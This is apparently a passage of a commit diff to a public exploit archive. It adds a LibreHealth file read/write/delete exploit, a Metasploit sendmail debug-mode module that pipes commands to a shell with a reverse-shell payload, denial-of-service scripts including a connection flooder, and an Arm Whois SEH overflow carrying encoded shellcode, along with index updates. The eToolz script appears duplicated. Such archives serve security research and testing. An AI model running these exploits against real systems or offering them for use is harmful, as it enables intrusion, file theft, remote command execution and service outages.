Content-Disposition: form-data; name="current_language"
en_US
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="btn_client_login"
-----------------------------71911072106778878648823492--
---

69
exploits/php/webapps/45802.txt Normal file
View file

@ -0,0 +1,69 @@
# Exploit Title: LibreHealth 2.0.0 - Arbitrary File Actions
# Date: 2018-10-19
# Exploit Author: Carlos Avila
# Vendor Homepage: https://librehealth.io/
# Software Link: https://github.com/LibreHealthIO/lh-ehr
# Version: < 2.0.0
# Tested on: Debian LAMP, LibreHealth 2.0.0
# LibreHealth is the 'fork' of the OpenEMR project. I have executed these PoCs
# based on on Bug Reported by Joshua Fam [@Insecurity]
# 1.Arbitrary File Read:
# In LibreHealth a user that has access to the portal patient (authenticated) can send a
# malicious POST request to read arbitrary files.
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
mode=get&docid=/etc/passwd
# This attack represents a file inclusion attack (LFI)
# 2.Arbitrary File Write:
# In LibreHealth a user that has access to the portal patient (authenticated) can send
# a malicious POST request to write arbitrary files.
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
mode=save&docid=payload.php&content=<?php phpinfo();?>
# When you send the attack you can browse the website where the file was written and
# the payload.php at http://192.168.6.200/patients/payload.php
# 3. Arbitrary File Delete:
# In LibreHealth a user that has access to the portal patient (authenticated) can send a
# malicious POST request to delete a arbitrary file.
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
mode=delete&docid=payload.php
# When you make the attack you can navigate on the deleted page and you should receive 404 error (page not found)

144
exploits/unix/remote/45789.rb Executable file
View file

@ -0,0 +1,144 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'expect'
class MetasploitModule < Msf::Exploit::Remote
# cmd/unix/reverse spams the session with Telnet codes on EOF
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Morris Worm sendmail Debug Mode Shell Escape',
'Description' => %q{
This module exploits sendmail's well-known historical debug mode to
escape to a shell and execute commands in the SMTP RCPT TO command.
This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
Currently only cmd/unix/reverse and cmd/unix/generic are supported.
},
'Author' => [
'Robert Tappan Morris', # Exploit and worm for sure
'Cliff Stoll', # The Cuckoo's Egg inspiration
'wvu' # Module and additional research
],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History
['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'], # Analysis
['URL', 'https://github.com/arialdomartini/morris-worm'], # Source
['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
],
'DisclosureDate' => 'Nov 2 1988',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false, # DefUid in src/conf.c, usually "daemon"
'Payload' => {'Compat' => {'RequiredCmd' => 'generic telnet'}},
'Targets' => [
# https://en.wikipedia.org/wiki/Source_Code_Control_System
['@(#)version.c 5.51 (Berkeley) 5/2/86', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}
))
register_options([Opt::RPORT(25)])
register_advanced_options([
OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5])
])
end
def check
checkcode = CheckCode::Safe
connect
res = sock.get_once
return CheckCode::Unknown unless res
if res =~ /^220.*Sendmail/
checkcode = CheckCode::Detected
end
sock.put("DEBUG\r\n")
res = sock.get_once
return checkcode unless res
if res.start_with?('200 Debug set')
checkcode = CheckCode::Appears
end
checkcode
rescue Rex::ConnectionError => e
vprint_error(e.message)
CheckCode::Unknown
ensure
disconnect
end
def exploit
# We don't care who the user is, so randomize it
from = rand_text_alphanumeric(8..42)
# Strip mail header with sed(1), pass to sh(1), and ensure a clean exit
to = %("| sed '1,/^$/d' | sh; exit 0")
# We don't have $PATH, so set one
path = '/bin:/usr/bin:/usr/ucb:/etc'
sploit = {
nil => /220.*Sendmail/,
'DEBUG' => /200 Debug set/,
"MAIL FROM:<#{from}>" => /250.*Sender ok/,
"RCPT TO:<#{to}>" => /250.*Recipient ok/,
'DATA' => /354 Enter mail/,
# Indent PATH= so it's not interpreted as part of the mail header
" PATH=#{path}" => nil,
'export PATH' => nil,
payload.encoded => nil,
'.' => /250 Ok/,
'QUIT' => /221.*closing connection/
}
print_status('Connecting to sendmail')
connect
print_status('Enabling debug mode and sending exploit')
sploit.each do |line, pattern|
Timeout.timeout(datastore['SendExpectTimeout']) do
if line
print_status("Sending: #{line}")
sock.put("#{line}\r\n")
end
if pattern
vprint_status("Expecting: #{pattern.inspect}")
sock.expect(pattern) do |pat|
return unless pat
vprint_good("Received: #{pat.first}")
end
end
end
end
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue Timeout::Error
fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
ensure
disconnect
end
def on_new_session(session)
print_warning("Do NOT type `exit', or else you may lose further shells!")
print_warning('Hit ^C to abort the session instead, please and thank you')
end
end

26
exploits/windows/dos/45800.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-11-05
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
# Steps to Reproduce:
# 1. Run the python code organization.py
# 2. Open organization_exploit.txt and copy the content
# 3. Open VSAXESS.exe
# 4. Register a password and username
# 5. choose 'Control Panel'
# 6. choose 'Access Control'
# 7. choose 'Add'
# 8. Paste the content from organization_exploit.txt on 'Organization' and Crashed
#!/usr/bin/env python3
content = "\x41" * 10000
f = open ("organization_exploit.txt", "w")
f.write(content)
f.close()

46
exploits/windows_x86-64/dos/45792.py Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: Blue Server 1.1 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-02
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.mafiatic.org/
# Software Link: https://master.dl.sourceforge.net/project/blueserver/Blue-Server-1.1.exe
# Version: 1.1
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
#!/usr/bin/python
import socket
print """
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----
Blue Server 1.1 Dos
Ihsan Sencan
---------------Ooooo----
( )
ooooO ) /
( ) (_/
\ (
\_)
"""
Ip = raw_input("[Ip]: ")
Port = 80 # Default port
d=[]
c=0
while 1:
try:
d.append(socket.create_connection((Ip,Port)))
d[c].send("BOOM")
print "Sie!"
c+=1
except socket.error:
print "Done!"
raw_input()
break

55
exploits/windows_x86-64/dos/45797.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: eToolz 3.4.8.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-03
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.gaijin.at
# Software Link: https://www.gaijin.at/de/software/etoolz
# Version: 3.4.8.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Host name / IP adress :
#!/usr/bin/python
buffer = "A" * 255
payload = buffer
try:
f=open("exp.txt","w")
print "[+] Creating %s bytes evil payload." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created."# Exploit Title: eToolz 3.4.8.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-03
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.gaijin.at
# Software Link: https://www.gaijin.at/de/software/etoolz
# Version: 3.4.8.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Host name / IP adress :
#!/usr/bin/python
buffer = "A" * 255
payload = buffer
try:
f=open("exp.txt","w")
print "[+] Creating %s bytes evil payload." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created."

68
exploits/windows_x86/local/45796.py Executable file
View file

@ -0,0 +1,68 @@
# Exploit Title: Arm Whois 3.11 - Buffer Overflow (SEH)
# Date: 2018-11-05
# Exploit Author: Yair Rodríguez Aparicio (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit)
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Proffesional Español SP3 x86 (PoC), Windows XP Proffesional English SP3 x86 (fully working)
# HOWTO:
# 1.- Run python code : python whois.py
# 2.- Copy content to clipboard, from console or from file - text.txt
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- CMD is popped.
#max buffer lenght: 658. Badchars: a lot of. alpha_mixed + "\x89" works fine.
#msfvenom -p windows/exec CMD=cmd.exe -f py -e x86/alpha_mixed -b "\x89"
#445
buf = ""
buf += "\x54\x5d\xdb\xd5\xd9\x75\xf4\x59\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
buf += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x6b\x58\x4d\x52"
buf += "\x33\x30\x75\x50\x35\x50\x31\x70\x4c\x49\x68\x65\x56"
buf += "\x51\x39\x50\x70\x64\x4c\x4b\x32\x70\x36\x50\x4e\x6b"
buf += "\x73\x62\x54\x4c\x4e\x6b\x72\x72\x62\x34\x4c\x4b\x54"
buf += "\x32\x54\x68\x34\x4f\x6d\x67\x32\x6a\x77\x56\x46\x51"
buf += "\x49\x6f\x6c\x6c\x47\x4c\x61\x71\x63\x4c\x63\x32\x54"
buf += "\x6c\x61\x30\x59\x51\x7a\x6f\x66\x6d\x35\x51\x4a\x67"
buf += "\x59\x72\x5a\x52\x33\x62\x30\x57\x4c\x4b\x50\x52\x64"
buf += "\x50\x4c\x4b\x52\x6a\x77\x4c\x4c\x4b\x42\x6c\x46\x71"
buf += "\x44\x38\x69\x73\x71\x58\x63\x31\x5a\x71\x73\x61\x4c"
buf += "\x4b\x32\x79\x35\x70\x47\x71\x6b\x63\x4e\x6b\x32\x69"
buf += "\x36\x78\x5a\x43\x45\x6a\x33\x79\x4e\x6b\x64\x74\x6c"
buf += "\x4b\x77\x71\x7a\x76\x35\x61\x4b\x4f\x6e\x4c\x7a\x61"
buf += "\x68\x4f\x64\x4d\x33\x31\x48\x47\x66\x58\x6d\x30\x53"
buf += "\x45\x49\x66\x54\x43\x43\x4d\x58\x78\x65\x6b\x61\x6d"
buf += "\x76\x44\x53\x45\x4d\x34\x50\x58\x4c\x4b\x42\x78\x74"
buf += "\x64\x56\x61\x39\x43\x71\x76\x6c\x4b\x34\x4c\x52\x6b"
buf += "\x4c\x4b\x32\x78\x55\x4c\x75\x51\x68\x53\x6e\x6b\x56"
buf += "\x64\x6e\x6b\x65\x51\x78\x50\x6c\x49\x73\x74\x37\x54"
buf += "\x47\x54\x61\x4b\x53\x6b\x53\x51\x71\x49\x73\x6a\x62"
buf += "\x71\x6b\x4f\x4d\x30\x33\x6f\x43\x6f\x71\x4a\x6c\x4b"
buf += "\x64\x52\x4a\x4b\x4e\x6d\x53\x6d\x31\x7a\x57\x71\x6c"
buf += "\x4d\x4c\x45\x68\x32\x47\x70\x47\x70\x57\x70\x66\x30"
buf += "\x75\x38\x56\x51\x6e\x6b\x70\x6f\x6d\x57\x39\x6f\x49"
buf += "\x45\x6d\x6b\x4a\x50\x4e\x55\x69\x32\x50\x56\x73\x58"
buf += "\x59\x36\x4c\x55\x6f\x4d\x6f\x6d\x6b\x4f\x48\x55\x67"
buf += "\x4c\x45\x56\x63\x4c\x77\x7a\x4f\x70\x59\x6b\x4d\x30"
buf += "\x30\x75\x57\x75\x4f\x4b\x37\x37\x42\x33\x70\x72\x62"
buf += "\x4f\x63\x5a\x75\x50\x50\x53\x39\x6f\x4b\x65\x35\x33"
buf += "\x50\x6d\x53\x54\x46\x4e\x30\x65\x62\x58\x53\x55\x75"
buf += "\x50\x41\x41"
shellcode = buf + "\x41"*(658-len(buf))
EDX_BAD_OVERWRITE = "\x42"*4
EIP = "\xC2\x34\x40"
second_space = "\xe9\x65\xFD\xFF\xFF"+ "\x43"*3
first_space = "\x43"*2 + "\xEB\xF2"
buffer = "\x41\x41" + shellcode + EDX_BAD_OVERWRITE + second_space + first_space + EIP
print buffer
f = open("text.txt", "w")
f.write(buffer)
f.close()

21
files_exploits.csv
View file

@ -6176,6 +6176,12 @@ id,file,description,date,author,type,platform,port
45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45781,exploits/windows_x86-64/dos/45781.py,"Softros LAN Messenger 9.2 - Denial of Service (PoC)",2018-11-05,"Victor Mondragón",dos,windows_x86-64,
45786,exploits/ios/dos/45786.txt,"FaceTime - RTP Video Processing Heap Corruption",2018-11-06,"Google Security Research",dos,ios,
45787,exploits/macos/dos/45787.txt,"FaceTime - 'readSPSandGetDecoderParams' Stack Corruption",2018-11-06,"Google Security Research",dos,macos,
45788,exploits/macos/dos/45788.txt,"FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption",2018-11-06,"Google Security Research",dos,macos,
45792,exploits/windows_x86-64/dos/45792.py,"Blue Server 1.1 - Denial of Service (PoC)",2018-11-06,"Ihsan Sencan",dos,windows_x86-64,
45797,exploits/windows_x86-64/dos/45797.py,"eToolz 3.4.8.0 - Denial of Service (PoC)",2018-11-06,"Ihsan Sencan",dos,windows_x86-64,
45800,exploits/windows/dos/45800.py,"VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)",2018-11-06,"Diego Santamaria",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10081,6 +10087,8 @@ id,file,description,date,author,type,platform,port
45778,exploits/windows/local/45778.txt,"Microsoft Internet Explorer 11 - Null Pointer Dereference",2018-11-05,LiquidWorm,local,windows,
45782,exploits/macos/local/45782.c,"LiquidVPN 1.36 / 1.37 - Privilege Escalation",2018-11-05,"Bernd Leitner",local,macos,
45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware,
45796,exploits/windows_x86/local/45796.py,"Arm Whois 3.11 - Buffer Overflow (SEH)",2018-11-06,"Semen Alexandrovich Lyhin",local,windows_x86,
45798,exploits/linux/local/45798.txt,"libiec61850 1.3 - Stack Based Buffer Overflow",2018-11-06,"Dhiraj Mishra",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16926,6 +16934,9 @@ id,file,description,date,author,type,platform,port
45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,
45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux,
45748,exploits/multiple/remote/45748.py,"Nutanix AOS & Prism < 5.5.5 (LTS) / < 5.8.1 (STS) - SFTP Authentication Bypass",2018-10-30,"Adam Brown",remote,multiple,
45789,exploits/unix/remote/45789.rb,"Morris Worm - sendmail Debug Mode Shell Escape (Metasploit)",2018-11-06,Metasploit,remote,unix,25
45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,
45791,exploits/bsd/remote/45791.rb,"Morris Worm - fingerd Stack Buffer Overflow (Metasploit)",2018-11-06,Metasploit,remote,bsd,79
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40291,6 +40302,12 @@ id,file,description,date,author,type,platform,port
45776,exploits/hardware/webapps/45776.py,"Virgin Media Hub 3.0 Router - Denial of Service (PoC)",2018-11-05,"Ross Inman",webapps,hardware,
45777,exploits/php/webapps/45777.txt,"Poppy Web Interface Generator 0.8 - Arbitrary File Upload",2018-11-05,"Ihsan Sencan",webapps,php,
45779,exploits/php/webapps/45779.txt,"Mongo Web Admin 6.0 - Information Disclosure",2018-11-05,"Ihsan Sencan",webapps,php,
45780,exploits/php/webapps/45780.py,"PHP Proxy 3.0.3 - Local File Inclusion",2018-11-05,AkkuS,webapps,php,
45780,exploits/php/webapps/45780.py,"PHP Proxy 3.0.3 - Local File Inclusion",2018-11-05,AkkuS,webapps,php,80
45783,exploits/json/webapps/45783.html,"Royal TS/X - Information Disclosure",2018-11-05,"Jakub Palaczynski",webapps,json,54890
45784,exploits/php/webapps/45784.txt,"Voovi Social Networking Script 1.0 - 'user' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,
45784,exploits/php/webapps/45784.txt,"Voovi Social Networking Script 1.0 - 'user' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80
45793,exploits/php/webapps/45793.py,"CMS Made Simple 2.2.7 - Remote Code Execution",2018-11-06,"Lucian Ioan Nitescu",webapps,php,
45794,exploits/php/webapps/45794.txt,"OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-06,"Ihsan Sencan",webapps,php,
45795,exploits/php/webapps/45795.txt,"Grocery crud 1.6.1 - 'search_field' SQL Injection",2018-11-06,"Loading Kura Kura",webapps,php,
45799,exploits/php/webapps/45799.txt,"OOP CMS BLOG 1.0 - 'search' SQL Injection",2018-11-06,"Ihsan Sencan",webapps,php,
45801,exploits/php/webapps/45801.txt,"OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection",2018-11-06,AkkuS,webapps,php,
45802,exploits/php/webapps/45802.txt,"LibreHealth 2.0.0 - Arbitrary File Actions",2018-11-06,"Carlos Avila",webapps,php,

Can't render this file because it is too large.